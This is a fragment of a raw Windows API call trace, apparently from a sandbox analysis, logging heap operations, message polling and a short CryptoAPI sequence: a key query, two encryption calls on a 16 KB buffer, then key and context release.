lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.974] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.974] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.974] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.975] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.976] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.976] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x3ead, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x3eb0) returned 1 [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] CharLowerBuffW (in: lpsz="byte[16049]", cchLength=0xb | out: lpsz="byte[16049]") returned 0xb [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.976] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.976] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf1d88*, pdwDataLen=0x87e820*=0x3ead, dwBufLen=0x3eb0 | out: pbData=0xbf1d88*, pdwDataLen=0x87e820*=0x3eb0) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.977] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.977] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.977] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.977] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.977] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.978] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.978] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.978] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.985] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.985] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.985] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.985] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.986] CryptDestroyKey (hKey=0x90af98) returned 1 [0190.986] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.986] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.986] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.986] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.986] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.986] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.001] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.001] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.001] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.001] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.001] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.001] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.002] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.002] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.002] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.002] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0191.002] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.003] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.003] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.004] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, 